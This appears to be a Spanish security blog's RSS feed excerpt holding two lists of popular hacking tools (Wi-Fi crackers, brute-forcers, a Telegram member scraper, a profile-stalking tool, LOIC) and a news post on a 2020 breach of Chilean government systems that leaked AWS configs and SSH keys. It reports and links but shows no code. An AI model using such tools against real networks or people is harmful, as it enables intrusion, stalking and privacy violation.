&lt;li&gt;&lt;a href="https://www.kitploit.com/2017/08/wifi-bruteforcer-android-application-to.html" target="_blank"&gt;WiFi Bruteforcer - Android application to brute force WiFi passwords (No Root Required)&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCkA2PEEUNoi5c7bT4L96plP6tK5n20Du3wroXoGYdh7iu_0fFPSiAJM5mcqGrh-i5UjnhRlYYK0vGyg34KSAlbHa2221HTv7f7BBn8KMEFMXy0crdmMAo9Tx5dBPxtkofslYbmU1UcU2m/s1280/16_wifi-bruteforcer.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="720" data-original-width="1280" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCkA2PEEUNoi5c7bT4L96plP6tK5n20Du3wroXoGYdh7iu_0fFPSiAJM5mcqGrh-i5UjnhRlYYK0vGyg34KSAlbHa2221HTv7f7BBn8KMEFMXy0crdmMAo9Tx5dBPxtkofslYbmU1UcU2m/w400-h225/16_wifi-bruteforcer.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2020/01/telegram-scraper-telegram-group-scraper.html" target="_blank"&gt;TeleGram-Scraper - Telegram Group Scraper Tool (Fetch All Information About Group Members)&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFSoF7_TJqOK_mRVrDsrTRMobPTDxdRBiIz6HW5WrIPjBh4zUzCbqH3VIn5xC8VgUaGijHFxIzN-9zDe3QmzlovSbXPUrtNVb1U_pwzvPk1tZ5on_1vH8s4ubgaOD9onH7_enx8_jfEfSw/s981/17_TeleGram-Scraper.jpeg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="363" data-original-width="981" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFSoF7_TJqOK_mRVrDsrTRMobPTDxdRBiIz6HW5WrIPjBh4zUzCbqH3VIn5xC8VgUaGijHFxIzN-9zDe3QmzlovSbXPUrtNVb1U_pwzvPk1tZ5on_1vH8s4ubgaOD9onH7_enx8_jfEfSw/w400-h148/17_TeleGram-Scraper.jpeg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2019/05/cqtools-new-ultimate-windows-hacking.html" target="_blank"&gt;CQTools - The New Ultimate Windows Hacking Toolkit&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2jgzkN4Pir99LrRU5VMIDPDEo2pxqK8HS4SuDpxZn0xzAN8_eQhnkIw39HLe_x_JUsJe7BoCmfS7uUzy6sGvREYwFhxHqn2Wgy1gO5yTj1RJ0WdX4ApBCpfpym8utL0thY0YYMuxxVFNI/s1024/18_cqurebhasia.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="576" data-original-width="1024" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2jgzkN4Pir99LrRU5VMIDPDEo2pxqK8HS4SuDpxZn0xzAN8_eQhnkIw39HLe_x_JUsJe7BoCmfS7uUzy6sGvREYwFhxHqn2Wgy1gO5yTj1RJ0WdX4ApBCpfpym8utL0thY0YYMuxxVFNI/w400-h225/18_cqurebhasia.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2020/08/hack-tools-all-in-one-red-team.html" target="_blank"&gt;Hack-Tools - The All-In-One Red Team Extension For Web Pentester&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj9qesQL5kyIOAdWTCYPYnzpbdu5XBqGI5ggyyMxC5dJlE1JnkQbpQKSJw31eo9uS_NYP7epKWV6DQy7UCgJrYvEDR_KgQpv-USxD3IDpJHG1zk75Zxv-hRkpWu5_cQHj9acQjNRmgbd0S/s1600/19_Hack-Tools.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1201" data-original-width="1600" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj9qesQL5kyIOAdWTCYPYnzpbdu5XBqGI5ggyyMxC5dJlE1JnkQbpQKSJw31eo9uS_NYP7epKWV6DQy7UCgJrYvEDR_KgQpv-USxD3IDpJHG1zk75Zxv-hRkpWu5_cQHj9acQjNRmgbd0S/w400-h300/19_Hack-Tools.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;li&gt;&lt;a href="https://www.kitploit.com/2020/03/udork-google-hacking-tool.html" target="_blank"&gt;uDork - Google Hacking Tool&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUXTDmkT8bxUFl2_LL8YGWgH-p4h25rQahyt00z2dMQmLaOgnHzQ3cA9r4YHYq7Q5apBqUbh-5j1fjpqXtlGh4Hy7Wq3FclCchnX6Yr8qeULlFR1yTAkCeyNy29zavi98zRMnQrw34OSwn/s592/20_uDork.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="249" data-original-width="592" height="169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUXTDmkT8bxUFl2_LL8YGWgH-p4h25rQahyt00z2dMQmLaOgnHzQ3cA9r4YHYq7Q5apBqUbh-5j1fjpqXtlGh4Hy7Wq3FclCchnX6Yr8qeULlFR1yTAkCeyNy29zavi98zRMnQrw34OSwn/w400-h169/20_uDork.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;/ol&gt;


&lt;br /&gt;
&lt;br /&gt;
[+] Saludos y feliz año nuevo!!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitxXq-w-ijszQ8zPrzQ2u7gJTNIjCGe3orJZ6HajinZADFGIYWWxdQGHZpZaDwm3ae2n1hh8evOF6UYP3q14I3JHNQ4eHZmEH42kDnE_VSjKMeNnf1Uho6_D4kmHZ1wyyTBOVx5334_3Yr/s72-w640-h426-c/tools-2020-final-en.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">4</thr:total></item><item><title>Hackeo sin presedentes a la infraestructura TI en Chile (Clave única, Gobierno Digital, Comisaría Virtual, Segpres y más han sido vulnerados)</title><link>http://www.blackploit.com/2020/10/hackeo-sin-presedentes-la.html</link><category>Chilean Way</category><category>Hacking</category><category>Leaks</category><category>Noticias</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Thu, 15 Oct 2020 03:19:00 -0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-8649215370980788014</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2KX0TVSj5khjkbtQV4d18qQzMv4jO4S-bt5WCgpeIWoRuSlhumZqJZVfMOzhm_HMyyA_ylVOIjNoEoNCFrsvvJvxnQOzZG2Gdm9OIppz-vqQHr668K_CHOsUxOlXWGHUTGeMxZoNaCs6g/s796/header.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="358" data-original-width="796" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2KX0TVSj5khjkbtQV4d18qQzMv4jO4S-bt5WCgpeIWoRuSlhumZqJZVfMOzhm_HMyyA_ylVOIjNoEoNCFrsvvJvxnQOzZG2Gdm9OIppz-vqQHr668K_CHOsUxOlXWGHUTGeMxZoNaCs6g/w640-h288/header.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p style="text-align: justify;"&gt;&amp;nbsp;Ayer en la mañana nos desayunamos la noticia de que existió "una posible brecha" en el sistema de clave única de Chile (es una forma centralizada en la cual un ciudadano chileno puede acceder a más de 900 trámites online con una sola contraseña), en la misma mañana salió un comunicado de Gobierno Digital apagando el incendio, diciendo que usaban un robusto sistema de hasheo en sus sistemas y aunque haya existido la brecha no se podía acceder a la clave única, pero igual de todas formas ya habían activado el protocolo de cambio de contraseñas de forma paulatina para evitar problemas.&lt;/p&gt;&lt;p&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt;&lt;a name='more'&gt;&lt;/a&gt;&amp;nbsp;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8PKpbbey44PuYBZDr02SYHd-AvOsRAar5O0JZelJt41so2EB-CXcEypU7XEqq9PFZWgE1YSvBMsaqcJGgdr55VYxrABwgUP4ww0oaaSXZ_niyZ0MNzVX71BNTD2k4ei4XQ09WzDbiG2YG/s965/Declaraci%25C3%25B3n+Gobierno+Digital.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="592" data-original-width="965" height="392" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8PKpbbey44PuYBZDr02SYHd-AvOsRAar5O0JZelJt41so2EB-CXcEypU7XEqq9PFZWgE1YSvBMsaqcJGgdr55VYxrABwgUP4ww0oaaSXZ_niyZ0MNzVX71BNTD2k4ei4XQ09WzDbiG2YG/w640-h392/Declaraci%25C3%25B3n+Gobierno+Digital.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&amp;nbsp;&lt;p&gt;&lt;/p&gt;&lt;p style="text-align: justify;"&gt;Ningún sistema es 100% seguro y estas cosas pueden pasar, el protocolo aplicado es el correcto en este tipo de casos, todo "normal" y en el peor de los casos se filtró tu clave única, pero nadie pudo realizar trámites a tu nombre ya que tu contraseña debe ser cambiada en el siguiente logeo (esto le ha pasado a grandes empresas como Dropbox, Linkedin, etc...).&lt;/p&gt;&lt;p style="text-align: justify;"&gt;Hasta aquí estamos hablando de un problema grave en la seguridad en &lt;b&gt;un sistema en particular&lt;/b&gt;, lo cual afecta de forma seria la funcionalidad de un sistema del Gobierno de Chile que es usado por prácticamente todos los chilenos, más ahora que estamos en pandemia... Pero el problema parecía haber sido amagado de forma correcta y esperábamos que no hubieran más incidencias, eso hasta que un twittero empieza a liberar los leaks de a poco...&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBbtm98Sk-hItQ5L3WXu9exQt4aGCxRr2yxUoeH9SwE0EYPkNsTU5ogqs_PLRV2t7E8e5-TYfnVmItWydj3MjxudxNBYyP8ifYrPwzr-CrmveX7lSF8j1-qZ47-z8C7zDXcTs01NMFbdFf/s855/data_leak_chile_1.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="855" data-original-width="620" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBbtm98Sk-hItQ5L3WXu9exQt4aGCxRr2yxUoeH9SwE0EYPkNsTU5ogqs_PLRV2t7E8e5-TYfnVmItWydj3MjxudxNBYyP8ifYrPwzr-CrmveX7lSF8j1-qZ47-z8C7zDXcTs01NMFbdFf/w464-h640/data_leak_chile_1.png" width="464" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7QoHjtFlDaJ7SJZl_TrOZ6mTWiRhP8E4Eh29n-O0sM0Cs1kv3XJaODeVDE4aK7nICUDlGaqBEAsyWuu6VaRnPVuDXap_gJDmUCIcZdP30ODeocayQFEbl40iVPt1SvM-6G9MKoDV40E-J/s807/data_leak_chile_3.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="807" data-original-width="638" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7QoHjtFlDaJ7SJZl_TrOZ6mTWiRhP8E4Eh29n-O0sM0Cs1kv3XJaODeVDE4aK7nICUDlGaqBEAsyWuu6VaRnPVuDXap_gJDmUCIcZdP30ODeocayQFEbl40iVPt1SvM-6G9MKoDV40E-J/w506-h640/data_leak_chile_3.png" width="506" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p style="text-align: justify;"&gt;Personalmente esperaba que las filtraciones fueran falsas o de bajo impacto, pero cuando empiezo a ver el contenido de los archivos mi peor temor fue confirmado.&lt;/p&gt;&lt;p style="text-align: justify;"&gt;No solamente habían vulnerado el sistema de Clave única, &lt;b&gt;habían comprometido toda la infraestructura de Gobierno Digital&lt;/b&gt;, infraestructura en la cual se cuenta con proyectos como Clave única, Comisaría Virtual, plataforma de tramites online del Ministerio de Bienes Nacionales, y muchos otros.&lt;br /&gt;&lt;br /&gt;La infraestructura está montada en &lt;b&gt;Amazon Web Services&lt;/b&gt; ya que uno de los archivos filtrados contiene todas las configuraciones en formato JSON de AWS, donde se encuentran los usuarios, grupos de acceso, políticas de seguridad, además de las funciones lamdas con sus respectivas variables de entorno:&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeum8djz6UiyvYHhhSn7so0D72LRWaWDL1sWjNLzDOjY6JYelPO807XnitKLdXiY3vwP0yhH9H5CQ69Dco_LRRBDI5x-M7dE1bMEDi66ECj4dYbJ3LxTu2a46KeSXfZ6Iof_uvf9m-EjOV/s863/users_aws.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="695" data-original-width="863" height="516" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeum8djz6UiyvYHhhSn7so0D72LRWaWDL1sWjNLzDOjY6JYelPO807XnitKLdXiY3vwP0yhH9H5CQ69Dco_LRRBDI5x-M7dE1bMEDi66ECj4dYbJ3LxTu2a46KeSXfZ6Iof_uvf9m-EjOV/w640-h516/users_aws.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAt4Q_uavUfmznihXVLNmM1I83n3mIfW9dO4Wnwh9a9_4mdtnmaLluSWLrVFbTHS4Lr3umFSLJkuPrcRk4k93QKwDIGMf3sHlgtntVwcDk8iUV1rod-wHpCss-rAnB499_ITw5r_jtUWZX/s1063/lambda_env.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="655" data-original-width="1063" height="394" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAt4Q_uavUfmznihXVLNmM1I83n3mIfW9dO4Wnwh9a9_4mdtnmaLluSWLrVFbTHS4Lr3umFSLJkuPrcRk4k93QKwDIGMf3sHlgtntVwcDk8iUV1rod-wHpCss-rAnB499_ITw5r_jtUWZX/w640-h394/lambda_env.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p style="text-align: justify;"&gt;Dentro de los archivos filtrados hay archivos de &lt;b&gt;configuración para VPNs&lt;/b&gt;, &lt;b&gt;llaves privadas SSH&lt;/b&gt;, muchos &lt;b&gt;dumps de bases de datos SQL&lt;/b&gt; y &lt;b&gt;código de aplicaciones&lt;/b&gt;, entre otros, en conjunto por el momento son más de &lt;b&gt;9 GB &lt;/b&gt;de archivos, en los cuales hay datos sensibles, contraseñas, nombres, trámites virtuales, API keys, endpoints e información de infraestructura. Al momento de escribir este artículo el usuario en twitter que está filtrando los archivos ya va por el número 16 y pareciera ser que son muchos más dado el nivel de compromiso que se logró en este ataque.&lt;/p&gt;&lt;p style="text-align: justify;"&gt;Sin duda un día gris para la democracia digital en Chile. Durante el día es esperable que los medio amplíen la información, pero como no son expertos en la materia quizás no vean el grave impacto que hay producto de este ataque.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Saludos!&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2KX0TVSj5khjkbtQV4d18qQzMv4jO4S-bt5WCgpeIWoRuSlhumZqJZVfMOzhm_HMyyA_ylVOIjNoEoNCFrsvvJvxnQOzZG2Gdm9OIppz-vqQHr668K_CHOsUxOlXWGHUTGeMxZoNaCs6g/s72-w640-h288-c/header.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Las 20 herramientas de hacking más populares del 2019</title><link>http://www.blackploit.com/2019/12/las-20-herramientas-de-hacking-mas.html</link><category>Blackploit</category><category>Hack T00LZ</category><category>Herramientas</category><category>KitPloit</category><category>Noticias</category><category>Seguridad</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Sat, 28 Dec 2019 10:00:00 -0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-7548698232456184236</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiD_Ds4DUGVOsDW-O9ZjsXROzlh5Lz0h1K0Rr6R3PSMazvnW4eZGAff_pJBMD1B4l4QLD70qoWV0qgmDGQ36NAfGEURcZNJTdDTmIxxGT6VZszX68EaQozbk_hQuzZA5a5qDX-SpECFr4Vu/s1600/best-tools-2019.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="800" data-original-width="1200" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiD_Ds4DUGVOsDW-O9ZjsXROzlh5Lz0h1K0Rr6R3PSMazvnW4eZGAff_pJBMD1B4l4QLD70qoWV0qgmDGQ36NAfGEURcZNJTdDTmIxxGT6VZszX68EaQozbk_hQuzZA5a5qDX-SpECFr4Vu/s640/best-tools-2019.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&amp;nbsp; &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En un ranking elaborado por &lt;a href="https://www.kitploit.com/" target="_blank"&gt;&lt;b&gt;Kitploit&lt;/b&gt;&lt;/a&gt;, nos muestran las 20 herramientas más populares (con más visitas) durante el 2019. Es una lista que merece ser revisada, donde se encuentran herramientas de diferentes desarrolladores quienes dedican su tiempo y esfuerzo a colaborar con la comunidad.&amp;nbsp;&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Destacan herramientas de &lt;b&gt;Information Gathering&lt;/b&gt;, &lt;b&gt;ingeniería social (&lt;i&gt;phishing&lt;/i&gt;)&lt;/b&gt;, &lt;b&gt;OSINT&lt;/b&gt;, entre otras. Sin más, los dejo con la lista:&lt;/div&gt;
&lt;!--more--&gt;&lt;br /&gt;
&lt;ol&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2018/04/hijacker-v15-all-in-one-wi-fi-cracking.html" target="_blank"&gt;Hijacker - All-in-One Wi-Fi Cracking Tools for Android&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG3OAkf49SmZBWicXJpBH6chukFSly87ir659WARxBcpk7st90dUunQGKoqsKMf9GKuavRmCP2NO4zQoVSzClRg49sSj4ZWXC_CLZ5mpZ75x2slDZk3H3xTMQCwiIt1G1mUwYYWzL4jNp0/s1600/Hijacker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="577" data-original-width="980" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG3OAkf49SmZBWicXJpBH6chukFSly87ir659WARxBcpk7st90dUunQGKoqsKMf9GKuavRmCP2NO4zQoVSzClRg49sSj4ZWXC_CLZ5mpZ75x2slDZk3H3xTMQCwiIt1G1mUwYYWzL4jNp0/s400/Hijacker.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2019/12/findomain-v093-fastest-and-cross.html" target="_blank"&gt;Findomain - The Fastest And Cross-Platform Subdomain Enumerator&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4iCPZn2tGyaSxHuF_o-OOa8uO2ZTc4EpEFtlNq0Wd_-G8CYPek-fpqyMwgFZ8HjQv06EDiPY7yD0OxS8v4Q2lDXZXEai3QwCAh9S4EvvcDMvjhTMsyqvIY-cvjta0ny8gstaM-yWjTFbv/s1600/findomain_4_findomain.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="169" data-original-width="624" height="107" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4iCPZn2tGyaSxHuF_o-OOa8uO2ZTc4EpEFtlNq0Wd_-G8CYPek-fpqyMwgFZ8HjQv06EDiPY7yD0OxS8v4Q2lDXZXEai3QwCAh9S4EvvcDMvjhTMsyqvIY-cvjta0ny8gstaM-yWjTFbv/s400/findomain_4_findomain.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2018/07/eagleeye-stalk-your-friends-find-their.html" target="_blank"&gt;EagleEye - Stalk Your Friends. Find Their Instagram, FB And Twitter Profiles Using Image Recognition And Reverse Image Search&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh60aDHfaIvO89vPfAltERqm-LvW_3gW4E4KS_J30sf6GJ4ANq-ySo1gRZvPHku-3v7s966apa7HbkpCkIgTQqcz6G9MSl9ZHegpZcBmxybp8qp-4jT7pHoUXPgWt_YF2xqHsfNtem8Eldb/s1600/EagleEye.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="673" data-original-width="943" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh60aDHfaIvO89vPfAltERqm-LvW_3gW4E4KS_J30sf6GJ4ANq-ySo1gRZvPHku-3v7s966apa7HbkpCkIgTQqcz6G9MSl9ZHegpZcBmxybp8qp-4jT7pHoUXPgWt_YF2xqHsfNtem8Eldb/s400/EagleEye.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2019/12/andrax-v4-dragonfly-penetration-testing.html" target="_blank"&gt;ANDRAX - Penetration Testing on Android&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd_shqWc2-6dBUTATR1AXmULt0HjETokuqcz85OHIAnqt7Ob2iA59FSZkSb5fzzPGwAxN2LLccd_1BAstoaB8HEGgKW7QrJNVTxlScawjaE5uFDxSktdWA4LkovwCsn9-0ziJuIVFU1qnQ/s1600/andrax-logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="617" data-original-width="1024" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd_shqWc2-6dBUTATR1AXmULt0HjETokuqcz85OHIAnqt7Ob2iA59FSZkSb5fzzPGwAxN2LLccd_1BAstoaB8HEGgKW7QrJNVTxlScawjaE5uFDxSktdWA4LkovwCsn9-0ziJuIVFU1qnQ/s320/andrax-logo.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2019/05/cqtools-new-ultimate-windows-hacking.html" target="_blank"&gt;CQTools - The New Ultimate Windows Hacking Toolkit&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKCZnC5qhN6gGagBpuUteADmLEQAnfkj0EnkfozXm6qRfLUyB3oB5RUhCkqm3GShB8La9A8T1oHg4bNZyOpZIiZ-DpGk89zOJjr-Y13Co8E_YWy-5_Ofs-7IBa4MiUj5NpeFw9vvMZB7Eg/s1600/cqurebhasia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="576" data-original-width="1024" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKCZnC5qhN6gGagBpuUteADmLEQAnfkj0EnkfozXm6qRfLUyB3oB5RUhCkqm3GShB8La9A8T1oHg4bNZyOpZIiZ-DpGk89zOJjr-Y13Co8E_YWy-5_Ofs-7IBa4MiUj5NpeFw9vvMZB7Eg/s400/cqurebhasia.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2019/08/sampler-tool-for-shell-commands.html" target="_blank"&gt;Sampler - A Tool For Shell Commands Execution, Visualization And Alerting (Configured With A Simple YAML File)&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8Rb-Z5utVSgatdb3p4wk34CgcZC950LBk4t4tYGhloS4TtXoc1QhuKTvhcHOVbstg_O7xjyiix4smgoL4_zs09Dn9hn92ygzdH1anSQe0urdHzspHYf1gl6scAWAvJ5SQatPIDRsH5_yX/s1600/sampler_3.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="807" data-original-width="1600" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8Rb-Z5utVSgatdb3p4wk34CgcZC950LBk4t4tYGhloS4TtXoc1QhuKTvhcHOVbstg_O7xjyiix4smgoL4_zs09Dn9hn92ygzdH1anSQe0urdHzspHYf1gl6scAWAvJ5SQatPIDRsH5_yX/s400/sampler_3.gif" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2014/12/loic-108-low-orbit-ion-cannon-network.html" target="_blank"&gt;LOIC (Low Orbit Ion Cannon) - A network stress testing application&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
